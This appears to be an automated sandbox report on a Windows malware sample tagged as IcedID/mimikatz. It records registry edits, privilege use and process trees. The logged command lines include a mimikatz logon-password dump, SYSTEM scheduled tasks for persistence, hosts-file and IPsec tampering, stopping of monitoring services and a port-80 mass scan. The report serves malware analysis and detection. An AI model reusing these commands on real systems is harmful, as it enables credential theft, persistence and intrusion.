\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yyuzvnr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language tuznevtjd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wpcap.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language yyuzvnr.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language penegiqll.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language netsh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language PING.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 2964 cmd.exe 4428 PING.EXE -
NSIS installer 3 IoCs
resource yara_rule behavioral2/files/0x000a000000023b88-6.dat nsis_installer_2 behavioral2/files/0x000a000000023b95-14.dat nsis_installer_1 behavioral2/files/0x000a000000023b95-14.dat nsis_installer_2 -
Modifies data under HKEY_USERS 45 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1" yyuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ yyuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" yyuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" yyuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" yyuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing yyuzvnr.exe Key created \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump tllgdyunt.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Sysinternals\ProcDump\EulaAccepted = "1" tllgdyunt.exe -
Modifies registry class 14 IoCs
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbe\ yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ = "txtfile" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ = "txtfile" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.cmd\ = "txtfile" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.ps1\ yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.bat\ = "txtfile" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.VBE\ = "txtfile" yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.js\ = "txtfile" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ yyuzvnr.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.vbs\ = "txtfile" yyuzvnr.exe Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.reg\ yyuzvnr.exe -
Runs net.exe
-
Runs ping.exe 1 TTPs 1 IoCs
pid Process 4428 PING.EXE -
Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4612 schtasks.exe 1740 schtasks.exe 4628 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe -
Suspicious behavior: LoadsDriver 15 IoCs
pid Process 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found 656 Process not Found -
Suspicious behavior: RenamesItself 1 IoCs
pid Process 1340 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe -
Suspicious use of AdjustPrivilegeToken 24 IoCs
description pid Process Token: SeDebugPrivilege 1340 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe Token: SeDebugPrivilege 1448 yyuzvnr.exe Token: SeDebugPrivilege 2292 yyuzvnr.exe Token: SeDebugPrivilege 3316 vfshost.exe Token: SeDebugPrivilege 3244 tllgdyunt.exe Token: SeLockMemoryPrivilege 3188 uieubf.exe Token: SeLockMemoryPrivilege 3188 uieubf.exe Token: SeDebugPrivilege 3452 tllgdyunt.exe Token: SeDebugPrivilege 3548 tllgdyunt.exe Token: SeDebugPrivilege 2296 tllgdyunt.exe Token: SeDebugPrivilege 4684 tllgdyunt.exe Token: SeDebugPrivilege 3504 tllgdyunt.exe Token: SeDebugPrivilege 1400 tllgdyunt.exe Token: SeDebugPrivilege 1840 tllgdyunt.exe Token: SeDebugPrivilege 2208 tllgdyunt.exe Token: SeDebugPrivilege 2648 tllgdyunt.exe Token: SeDebugPrivilege 4836 tllgdyunt.exe Token: SeDebugPrivilege 2108 tllgdyunt.exe Token: SeDebugPrivilege 4276 tllgdyunt.exe Token: SeDebugPrivilege 2976 tllgdyunt.exe Token: SeDebugPrivilege 4652 tllgdyunt.exe Token: SeDebugPrivilege 2864 tllgdyunt.exe Token: SeDebugPrivilege 1384 tllgdyunt.exe Token: SeDebugPrivilege 5084 tllgdyunt.exe -
Suspicious use of SetWindowsHookEx 12 IoCs
pid Process 1340 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe 1340 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe 1448 yyuzvnr.exe 1448 yyuzvnr.exe 2292 yyuzvnr.exe 2292 yyuzvnr.exe 672 xohudmc.exe 2372 iaacws.exe 3248 yyuzvnr.exe 3248 yyuzvnr.exe 5544 yyuzvnr.exe 5544 yyuzvnr.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 1340 wrote to memory of 2964 1340 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe 83 PID 1340 wrote to memory of 2964 1340 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe 83 PID 1340 wrote to memory of 2964 1340 2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe 83 PID 2964 wrote to memory of 4428 2964 cmd.exe 85 PID 2964 wrote to memory of 4428 2964 cmd.exe 85 PID 2964 wrote to memory of 4428 2964 cmd.exe 85 PID 2964 wrote to memory of 1448 2964 cmd.exe 86 PID 2964 wrote to memory of 1448 2964 cmd.exe 86 PID 2964 wrote to memory of 1448 2964 cmd.exe 86 PID 2292 wrote to memory of 3760 2292 yyuzvnr.exe 88 PID 2292 wrote to memory of 3760 2292 yyuzvnr.exe 88 PID 2292 wrote to memory of 3760 2292 yyuzvnr.exe 88 PID 3760 wrote to memory of 1916 3760 cmd.exe 90 PID 3760 wrote to memory of 1916 3760 cmd.exe 90 PID 3760 wrote to memory of 1916 3760 cmd.exe 90 PID 3760 wrote to memory of 4180 3760 cmd.exe 91 PID 3760 wrote to memory of 4180 3760 cmd.exe 91 PID 3760 wrote to memory of 4180 3760 cmd.exe 91 PID 3760 wrote to memory of 5084 3760 cmd.exe 92 PID 3760 wrote to memory of 5084 3760 cmd.exe 92 PID 3760 wrote to memory of 5084 3760 cmd.exe 92 PID 3760 wrote to memory of 3772 3760 cmd.exe 93 PID 3760 wrote to memory of 3772 3760 cmd.exe 93 PID 3760 wrote to memory of 3772 3760 cmd.exe 93 PID 3760 wrote to memory of 5016 3760 cmd.exe 94 PID 3760 wrote to memory of 5016 3760 cmd.exe 94 PID 3760 wrote to memory of 5016 3760 cmd.exe 94 PID 3760 wrote to memory of 2408 3760 cmd.exe 95 PID 3760 wrote to memory of 2408 3760 cmd.exe 95 PID 3760 wrote to memory of 2408 3760 cmd.exe 95 PID 2292 wrote to memory of 220 2292 yyuzvnr.exe 97 PID 2292 wrote to memory of 220 2292 yyuzvnr.exe 97 PID 2292 wrote to memory of 220 2292 yyuzvnr.exe 97 PID 2292 wrote to memory of 1952 2292 yyuzvnr.exe 99 PID 2292 wrote to memory of 1952 2292 yyuzvnr.exe 99 PID 2292 wrote to memory of 1952 2292 yyuzvnr.exe 99 PID 2292 wrote to memory of 100 2292 yyuzvnr.exe 101 PID 2292 wrote to memory of 100 2292 yyuzvnr.exe 101 PID 2292 wrote to memory of 100 2292 yyuzvnr.exe 101 PID 2292 wrote to memory of 1676 2292 yyuzvnr.exe 115 PID 2292 wrote to memory of 1676 2292 yyuzvnr.exe 115 PID 2292 wrote to memory of 1676 2292 yyuzvnr.exe 115 PID 1676 wrote to memory of 2228 1676 cmd.exe 117 PID 1676 wrote to memory of 2228 1676 cmd.exe 117 PID 1676 wrote to memory of 2228 1676 cmd.exe 117 PID 2228 wrote to memory of 4280 2228 wpcap.exe 118 PID 2228 wrote to memory of 4280 2228 wpcap.exe 118 PID 2228 wrote to memory of 4280 2228 wpcap.exe 118 PID 4280 wrote to memory of 4716 4280 net.exe 120 PID 4280 wrote to memory of 4716 4280 net.exe 120 PID 4280 wrote to memory of 4716 4280 net.exe 120 PID 2228 wrote to memory of 3300 2228 wpcap.exe 121 PID 2228 wrote to memory of 3300 2228 wpcap.exe 121 PID 2228 wrote to memory of 3300 2228 wpcap.exe 121 PID 3300 wrote to memory of 2156 3300 net.exe 123 PID 3300 wrote to memory of 2156 3300 net.exe 123 PID 3300 wrote to memory of 2156 3300 net.exe 123 PID 2228 wrote to memory of 1196 2228 wpcap.exe 124 PID 2228 wrote to memory of 1196 2228 wpcap.exe 124 PID 2228 wrote to memory of 1196 2228 wpcap.exe 124 PID 1196 wrote to memory of 744 1196 net.exe 126 PID 1196 wrote to memory of 744 1196 net.exe 126 PID 1196 wrote to memory of 744 1196 net.exe 126 PID 2228 wrote to memory of 2716 2228 wpcap.exe 127
Processes
-
C:\Windows\System32\spoolsv.exeC:\Windows\System32\spoolsv.exe1⤵PID:1396
-
C:\Windows\TEMP\bqazjegtg\uieubf.exe"C:\Windows\TEMP\bqazjegtg\uieubf.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3188
-
-
C:\Users\Admin\AppData\Local\Temp\2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe"C:\Users\Admin\AppData\Local\Temp\2025-01-09_47520804f3f824bb4ed7328a05e192b2_hacktools_icedid_mimikatz.exe"1⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: RenamesItself
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1340 -
C:\Windows\SysWOW64\cmd.execmd /c ping 127.0.0.1 -n 5 & Start C:\Windows\klhnlzly\yyuzvnr.exe2⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Suspicious use of WriteProcessMemory
PID:2964 -
C:\Windows\SysWOW64\PING.EXEping 127.0.0.1 -n 53⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4428
-
-
C:\Windows\klhnlzly\yyuzvnr.exeC:\Windows\klhnlzly\yyuzvnr.exe3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:1448
-
-
-
C:\Windows\klhnlzly\yyuzvnr.exeC:\Windows\klhnlzly\yyuzvnr.exe1⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in Drivers directory
- Event Triggered Execution: Image File Execution Options Injection
- Executes dropped EXE
- Drops file in System32 directory
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2292 -
C:\Windows\SysWOW64\cmd.execmd /c echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D users & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D administrators & echo Y|cacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3760 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1916
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D users3⤵
- System Location Discovery: System Language Discovery
PID:4180
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5084
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D administrators3⤵
- System Location Discovery: System Language Discovery
PID:3772
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5016
-
-
C:\Windows\SysWOW64\cacls.execacls C:\Windows\system32\drivers\etc\hosts /T /D SYSTEM3⤵
- System Location Discovery: System Language Discovery
PID:2408
-
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static del all2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:220
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add policy name=Bastards description=FuckingBastards2⤵
- Event Triggered Execution: Netsh Helper DLL
PID:1952
-
-
C:\Windows\SysWOW64\netsh.exenetsh ipsec static add filteraction name=BastardsList action=block2⤵
- Event Triggered Execution: Netsh Helper DLL
- System Location Discovery: System Language Discovery
PID:100
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rgpuenbvt\hzvztyutv\wpcap.exe /S2⤵
- Suspicious use of WriteProcessMemory
PID:1676 -
C:\Windows\rgpuenbvt\hzvztyutv\wpcap.exeC:\Windows\rgpuenbvt\hzvztyutv\wpcap.exe /S3⤵
- Drops file in Drivers directory
- Executes dropped EXE
- Loads dropped DLL
- Drops file in System32 directory
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2228 -
C:\Windows\SysWOW64\net.exenet stop "Boundary Meter"4⤵
- Suspicious use of WriteProcessMemory
PID:4280 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "Boundary Meter"5⤵PID:4716
-
-
-
C:\Windows\SysWOW64\net.exenet stop "TrueSight Meter"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3300 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop "TrueSight Meter"5⤵
- System Location Discovery: System Language Discovery
PID:2156
-
-
-
C:\Windows\SysWOW64\net.exenet stop npf4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1196 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 stop npf5⤵
- System Location Discovery: System Language Discovery
PID:744
-
-
-
C:\Windows\SysWOW64\net.exenet start npf4⤵
- System Location Discovery: System Language Discovery
PID:2716 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf5⤵
- System Location Discovery: System Language Discovery
PID:896
-
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵
- System Location Discovery: System Language Discovery
PID:5076 -
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:1256 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵PID:4808
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c net start npf2⤵PID:5092
-
C:\Windows\SysWOW64\net.exenet start npf3⤵
- System Location Discovery: System Language Discovery
PID:2136 -
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start npf4⤵
- System Location Discovery: System Language Discovery
PID:2028
-
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rgpuenbvt\hzvztyutv\penegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\rgpuenbvt\hzvztyutv\Scant.txt2⤵
- System Location Discovery: System Language Discovery
PID:1384 -
C:\Windows\rgpuenbvt\hzvztyutv\penegiqll.exeC:\Windows\rgpuenbvt\hzvztyutv\penegiqll.exe -p 80 222.186.128.1-222.186.255.255 --rate=512 -oJ C:\Windows\rgpuenbvt\hzvztyutv\Scant.txt3⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:4204
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c C:\Windows\rgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit >> C:\Windows\rgpuenbvt\Corporate\log.txt2⤵
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3248 -
C:\Windows\rgpuenbvt\Corporate\vfshost.exeC:\Windows\rgpuenbvt\Corporate\vfshost.exe privilege::debug sekurlsa::logonpasswords exit3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3316
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "drhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\yyuzvnr.exe"2⤵
- System Location Discovery: System Language Discovery
PID:1952 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:1224
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "drhlvlrlm" /ru system /tr "cmd /c C:\Windows\ime\yyuzvnr.exe"3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4628
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "ylttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\yyuzvnr.exe /p everyone:F"2⤵PID:2216
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵PID:1704
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /sc minute /mo 1 /tn "ylttkgzdu" /ru system /tr "cmd /c echo Y|cacls C:\Windows\klhnlzly\yyuzvnr.exe /p everyone:F"3⤵
- Scheduled Task/Job: Scheduled Task
PID:1740
-
-
-
C:\Windows\SysWOW64\cmd.execmd /c echo Y|schtasks /create /sc minute /mo 1 /tn "eyqkeetlm" /ru system /tr "cmd /c echo Y|cacls C:\Windows\TEMP\bqazjegtg\uieubf.exe /p everyone:F"2⤵
- System Location Discovery: System Language Discovery
PID:3756 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"3⤵
- System Location Discovery: System Language Discovery
PID:5020
-
-
